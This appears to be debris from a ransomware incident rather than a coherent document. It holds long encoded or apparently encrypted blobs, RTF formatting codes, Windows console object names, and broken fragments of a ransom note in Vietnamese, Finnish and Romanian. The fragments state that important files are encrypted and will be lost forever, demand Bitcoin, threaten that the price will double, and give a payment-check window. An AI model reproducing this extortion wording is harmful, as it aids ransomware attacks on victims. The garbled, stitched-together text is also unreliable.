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 8*))c0}}{\\*\\pnseclvl5\\pndec\\pnstart1\\pnindent720\\pnhang {\\pntxtb \\hich (} \\red128\\green0\\blue128;\\red128\\green0\\blue0;\\red128\\green128\\blue0;\\red128\\green128\\blue128;\\red192\\green192\\blue192;}{\\*\\defchp \\fs22\\loch\\af31506\\hich\\af31506\\dbch\\af31505 }{\\*\\defpap \\ql \\li0\\ri0\\sa200\\sl276\\slmult1 \\red255\\green255\\blue255;\\red0\\green0\\blue128;\\red0\\green128\\blue128;\\red0\\green128\\blue0;\\red128\\green0\\blue128;\\red128\\green0\\blue0;\\red128\\green128\\blue0;\\red128\\green128\\blue128;\\red192\\green192\\blue192;\\red5\\green99\\blue193;}{\\*\\defchp \\RPC Control\\ConsoleLPC-0x000003BC-1333190300-13617924804819246357277348371021377984-952191596-1739269460-1455666328 \\RPC Control\\ConsoleLPC-0x00000994-1569971644598623547-530927353-1307907937824986770580215670695456530-1219771019 \\RPC Control\\ConsoleLPC-0x0000099C-9905856621666734106306486637-856033773-118775333815623337391005617996-1411360878 \\RPC Control\\ConsoleLPC-0x00000B34-241091258-10632443371550682790139018111216207573321532242973-15434746261325724320 \\RPC Control\\ConsoleLPC-0x00000D10--464568733-1459533581-633833832-1700943488-167131137-159572379113173873865730003 \\RPC Control\\ConsoleLPC-0x00000E8C--2121949365-1630700945947335501000294222-199221424210996338082031076023-577769686 \\rsid7998057\\rsid8592923\\rsid8656048\\rsid10768528\\rsid13911538\\rsid14237745\\rsid14432744\\rsid16127139\\rsid16253913\\rsid16278914}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1 senormstyforlist\\noindnmbrts\\felnbrelev\\nocxsptable\\indrlsweleven\\noafcnsttbl\\afelev\ \\nouicompat \\fet0{\\*\\wgrffmtfilter 2450} \\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 \\b\\fs28\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 20184\\'95\\'74\ \\af12\\afs22 \\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 \\b\\fs28\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 26377\\'97\\'4c\ \\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 \\fs22\\cf6\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 25105\\'89\\'e4}{\\rtlch\\fcs1 \\af11\\afs22 \\ltrch\\fcs0 \\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 \\fs22\\cf6\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 \\loch\\af18\\hich\\af18\\dbch\\f18 20449\\'ab\\'48\ \\af90\\afs22 \\ltrch\\fcs0 \\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 19968\\'88\\'ea\ \\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 22294\\'9a\\'a4\ \\af36\\afs22 \\ltrch\\fcs0 \\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 24536\\'96\\'59\ \\af11\\afs22 \\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 26371\\'98\\'f0\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 p x\\'fa\\loch\\f31502 c \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 ti}{ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n? \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 b}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 ph}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 m n\\'e0\\loch\\f31502 \\hich\\f31502 y v\\'e0\\loch\\f31502 \\hich\\f31502 v\\'f4\\loch\\f31502 hi}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n m}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\cf6\\insrsid8458214\\charrsid12743656 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 ki}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 li}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 ti}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 tr}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 t}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 gi\\'fa\\loch\\f31502 p c}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 kh\\'f4\\loch\\f31502 i ph}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 a Bitcoin v\\'e0\\loch\\f31502 mua m}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 a ch\\'fa\\loch\\f31502 \\hich\\f31502 ng t\\'f4\\loch\\f31502 i. \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 i. Ch\\'fa\\loch\\f31502 \\hich\\f31502 ng t\\'f4}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid14315351\\charrsid3475210 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 m tra: 9:00 s\\'e1\\loch\\f31502 \\hich\\f31502 ng - 11:00 s\\'e1\\loch\\f31502 ng GMT t}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 n ph\\'ed\\loch\\f31502 \\hich\\f31502 . H\\'e3\\loch\\f31502 y th}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 p v\\'e0\\loch\\f31502 o <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid3241513 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 u v\\'e0\\loch\\f31502 \\hich\\f31502 c\\'e1\\loch\\f31502 c t}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 a b}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 c ch}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 i c}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n c}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n mi}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n r}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n s}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 p c}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 t s}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 u b}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 bi}{ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 p ti \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 i gian. \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 a b}{ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid5593755\\charrsid11698073 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 >. Paras aika tarkistaa: klo 9.00-11.00 GMT maanantaista perjantaihin. \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 i fi}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 i ni}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 i. \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 ierele importante sunt criptate. \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 ierele pentru totdeauna. \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 te bitcoins. Pentru mai multe informa}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 ul va fi dublat. \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8528114 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 Contact Us}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid12997017\\charrsid8528114 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 >. \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 i thanh to\\'e1\\loch\\f31528 \\hich\\f31528 n. Sau \\'f0\\'f3\\loch\\f31528 \\hich\\f31528 gi\\'e1\\loch\\f31528 s}{\\rtlch\\fcs1 \\af2 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 n \\'f0}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 \\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 \\rtlch\\fcs1 \\af53\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 \\rtlch\\fcs1 \\af90\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 \\sbasedon10 \\slink15 \\slocked \\styrsid1838094 Plain Text Char;}}{\\*\\rsidtbl \\rsid1838094\\rsid1847526\\rsid2183709\\rsid6386681\\rsid13717663\\rsid14237745\\rsid14432744\\rsid15144481\\rsid15301782}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1 \\sbasedon10 \\slink15 \\slocked \\styrsid3689921 Plain Text Char;}}{\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid3689921\\rsid5275506\\rsid14178431\\rsid14237745\\rsid14432744\\rsid15289305}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0 